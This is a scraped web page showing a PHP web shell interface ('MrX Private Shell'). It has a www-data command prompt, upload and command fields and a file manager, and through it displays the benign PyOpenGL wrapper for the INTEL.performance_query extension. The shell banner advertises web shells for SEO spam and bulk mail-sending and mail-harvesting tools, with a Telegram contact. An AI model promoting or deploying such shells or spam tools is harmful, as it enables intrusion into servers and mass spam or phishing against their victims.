__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.65: ~ $
'''OpenGL extension INTEL.performance_query

This module customises the behaviour of the 
OpenGL.raw.GL.INTEL.performance_query to provide a more 
Python-friendly API

Overview (from the spec)
	
	The purpose of this extension is to expose Intel proprietary hardware
	performance counters to the OpenGL applications. Performance counters may
	count:
	
	- number of hardware events such as number of spawned vertex shaders. In
	  this case the results represent the number of events.
	
	- duration of certain activity, like time took by all fragment shader
	  invocations. In that case the result usually represents the number of
	  clocks in which the particular HW unit was busy. In order to use such
	  counter efficiently, it should be normalized to the range of <0,1> by
	  dividing its value by the number of render clocks.
	
	- used throughput of certain memory types such as texture memory. In that
	  case the result of performance counter usually represents the number of
	  bytes transferred between GPU and memory.
	
	This extension specifies universal API to manage performance counters on
	different Intel hardware platforms. Performance counters are grouped
	together into proprietary, hardware-specific, fixed sets of counters that
	are measured together by the GPU.
	
	It is assumed that performance counters are started and ended on any
	arbitrary boundaries during rendering. 
	
	A set of performance counters is represented by a unique query type. Each
	query type is identified by assigned name and ID. Multiple query types
	(sets of performance counters) are supported by the Intel hardware. However
	each Intel hardware generation supports different sets of performance
	counters.  Therefore the query types between hardware generations can be
	different. The definition of query types and their results structures can
	be learned through the API. It is also documented in a separate document of
	Intel OGL Performance Counters Specification issued per each new hardware
	generation.
	
	The API allows to create multiple instances of any query type and to sample
	different fragments of 3D rendering with such instances. Query instances
	are identified with handles.

The official definition of this extension is available here:
http://www.opengl.org/registry/specs/INTEL/performance_query.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.INTEL.performance_query import *
from OpenGL.raw.GL.INTEL.performance_query import _EXTENSION_NAME

def glInitPerformanceQueryINTEL():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )

# INPUT glGetPerfCounterInfoINTEL.counterDesc size not checked against counterDescLength
# INPUT glGetPerfCounterInfoINTEL.counterName size not checked against counterNameLength
glGetPerfCounterInfoINTEL=wrapper.wrapper(glGetPerfCounterInfoINTEL).setInputArraySize(
    'counterDesc', None
).setInputArraySize(
    'counterName', None
)
# INPUT glGetPerfQueryInfoINTEL.queryName size not checked against queryNameLength
glGetPerfQueryInfoINTEL=wrapper.wrapper(glGetPerfQueryInfoINTEL).setInputArraySize(
    'queryName', None
)
### END AUTOGENERATED SECTION

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 23 B 0644
blackhole_render.py File 1.15 KB 0644
conservative_rasterization.py File 1.64 KB 0644
fragment_shader_ordering.py File 1.98 KB 0644
framebuffer_CMAA.py File 1.51 KB 0644
map_texture.py File 1.68 KB 0644
parallel_arrays.py File 1.24 KB 0644
performance_query.py File 3.26 KB 0644
Filemanager